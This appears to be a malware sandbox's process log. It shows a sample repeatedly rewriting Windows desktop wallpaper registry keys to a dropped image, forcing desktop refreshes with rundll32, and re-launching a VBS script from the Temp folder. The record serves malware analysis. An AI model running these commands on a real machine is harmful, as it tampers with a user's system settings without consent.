C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:5384
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:5404
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:5444
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:5484
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:5544
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:5576
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:5664
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:5704
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:5732
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:5796
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:5800
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:5936
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:5980
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:5996
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:1456
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:6044
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:6072
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:5132
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:5188
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:5184
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:5244
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:5344
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:5384
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:5444
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:5544
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:5576
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:5664
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:5772
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:5808
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:5944
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:5964
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:5992
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:1456
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:5160
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:5212
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:5184
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:5416
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:5580
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:5608
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:5576
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:5808
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:5944
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:5964
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:5992
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:6104
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:5212
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:5420
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:5444
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:5608
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:5808
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:5944
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:6128
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:1456
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:5244
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:5444
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:5980
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:5996
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:6032
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:6104
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:3296
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:5608
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:5964
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:5996
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:5976
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:3296
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:6104
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:5808
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:5984
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:3296
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:6104
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:5808
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:6164
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:6176
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:6188
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:6200
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:6216
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:6232
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:6248
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:6268
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:6280
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:6292
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:6308
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:6336
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:6352
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:6364
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:6376
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:6392
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:6408
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:6436
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:6448
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:6460
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:6472
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:6484
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:6508
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:6516
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:6556
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:6576
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:6588
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:6600
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:6620
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:6648
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:6696
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:6744
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:6768
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:6780
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:6796
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:6820
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:6844
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:6856
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:6868
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:6880
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:6964
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:6992
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:7012
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:7024
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:7036
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:7056
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:7072
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:7084
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:7104
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:7124
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:7144
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:7160
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:5808
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:6164
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:6188
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:6240
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:6248
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:6268
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:6296
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:6292
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:6360
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:6364
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:6384
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:6404
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:6436
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:6448
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:6480
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:6484
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:3404
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:4580
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:6520
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:2956
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:6592
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:6604
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:6600
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:6660
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:1140
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:3416
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:1848
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:6752
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:6288
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:6292
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:6368
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:6388
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:6404
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:6448
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:1556
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:5016
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:1492
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:4580
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:6608
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:6652
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:3856
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:6728
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:6744
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:4452
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:6352
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:6384
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:6388
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:6404
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:6448
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:1556
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:668
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:6608
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:6652
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:6660
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:6756
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:3752
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:6376
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:6404
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:1556
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:6604
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:6608
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:2320
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:3568
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:6292
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:6464
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:6460
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:6404
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:668
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:3416
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:4840
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:6292
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:1812
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:408
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:6604
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:4840
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:6292
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:6464
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:4700
-
-
